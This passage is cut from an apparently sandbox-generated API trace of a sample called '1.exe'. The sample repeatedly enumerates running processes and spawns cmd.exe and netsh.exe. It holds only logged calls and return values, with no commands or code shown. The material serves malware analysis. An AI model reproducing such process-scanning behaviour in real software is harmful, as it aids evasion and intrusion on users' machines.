lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0151.329] GetLastError () returned 0x12 [0151.329] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0151.330] GetLastError () returned 0x12 [0151.330] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0151.330] GetLastError () returned 0x12 [0151.330] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0151.331] GetLastError () returned 0x12 [0151.331] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0151.332] GetLastError () returned 0x12 [0151.332] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0151.332] GetLastError () returned 0x12 [0151.333] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="netsh.exe")) returned 1 [0151.333] GetLastError () returned 0x12 [0151.333] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.334] GetLastError () returned 0x12 [0151.334] Process32NextW (in: hSnapshot=0x2fc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0151.334] CloseHandle (hObject=0x2fc) returned 1 [0151.334] Sleep (dwMilliseconds=0x1f4) [0151.868] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2dc [0151.872] Process32FirstW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0151.873] GetLastError () returned 0x12 [0151.873] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0151.874] GetLastError () returned 0x12 [0151.874] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0151.874] GetLastError () returned 0x12 [0151.874] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.875] GetLastError () returned 0x12 [0151.875] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0151.876] GetLastError () returned 0x12 [0151.876] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0151.876] GetLastError () returned 0x12 [0151.876] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0151.877] GetLastError () returned 0x12 [0151.877] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0151.877] GetLastError () returned 0x12 [0151.878] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0151.878] GetLastError () returned 0x12 [0151.878] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0151.879] GetLastError () returned 0x12 [0151.879] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0151.879] GetLastError () returned 0x12 [0151.880] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.880] GetLastError () returned 0x12 [0151.880] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.881] GetLastError () returned 0x12 [0151.881] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0151.881] GetLastError () returned 0x12 [0151.881] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.882] GetLastError () returned 0x12 [0151.882] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.883] GetLastError () returned 0x12 [0151.883] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.883] GetLastError () returned 0x12 [0151.883] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.884] GetLastError () returned 0x12 [0151.884] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.885] GetLastError () returned 0x12 [0151.885] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x498, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.885] GetLastError () returned 0x12 [0151.885] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.886] GetLastError () returned 0x12 [0151.886] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.887] GetLastError () returned 0x12 [0151.887] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.887] GetLastError () returned 0x12 [0151.887] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.888] GetLastError () returned 0x12 [0151.888] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0151.888] GetLastError () returned 0x12 [0151.889] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x690, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.889] GetLastError () returned 0x12 [0151.889] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4dc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0151.890] GetLastError () returned 0x12 [0151.890] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x700, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0151.890] GetLastError () returned 0x12 [0151.890] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x720, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.891] GetLastError () returned 0x12 [0151.891] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0151.892] GetLastError () returned 0x12 [0151.892] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0151.892] GetLastError () returned 0x12 [0151.892] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0151.893] GetLastError () returned 0x12 [0151.893] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0151.901] GetLastError () returned 0x12 [0151.901] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x8a0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0151.902] GetLastError () returned 0x12 [0151.902] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0151.902] GetLastError () returned 0x12 [0151.902] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0151.903] GetLastError () returned 0x12 [0151.903] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x864, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0151.904] GetLastError () returned 0x12 [0151.904] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0151.904] GetLastError () returned 0x12 [0151.904] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x8cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0151.905] GetLastError () returned 0x12 [0151.905] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="1.exe")) returned 1 [0151.906] GetLastError () returned 0x12 [0151.906] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0151.906] GetLastError () returned 0x12 [0151.906] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf00, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0151.907] GetLastError () returned 0x12 [0151.907] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf30, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0151.908] GetLastError () returned 0x12 [0151.908] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf38, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0151.908] GetLastError () returned 0x12 [0151.908] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0151.909] GetLastError () returned 0x12 [0151.909] Process32NextW (in: hSnapshot=0x2dc, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0151.958] CloseHandle (hObject=0x2dc) returned 1 [0151.958] Sleep (dwMilliseconds=0x1f4) [0152.714] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2e4 [0152.718] Process32FirstW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0152.719] GetLastError () returned 0x12 [0152.719] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6e, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0152.720] GetLastError () returned 0x12 [0152.720] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x13c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0152.720] GetLastError () returned 0x12 [0152.721] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.721] GetLastError () returned 0x12 [0152.721] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0152.722] GetLastError () returned 0x12 [0152.722] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0152.723] GetLastError () returned 0x12 [0152.723] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0152.723] GetLastError () returned 0x12 [0152.723] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0152.724] GetLastError () returned 0x12 [0152.724] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0152.724] GetLastError () returned 0x12 [0152.725] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0152.725] GetLastError () returned 0x12 [0152.725] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0152.726] GetLastError () returned 0x12 [0152.726] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.726] GetLastError () returned 0x12 [0152.726] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.727] GetLastError () returned 0x12 [0152.727] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0152.728] GetLastError () returned 0x12 [0152.728] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.728] GetLastError () returned 0x12 [0152.728] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.729] GetLastError () returned 0x12 [0152.729] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0152.730] GetLastError () returned 0x12 [0152.730] Process32NextW (in: hSnapshot=0x2e4, lppe=0x2a6f6a0 | out: lppe=0x2a6f6a0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, 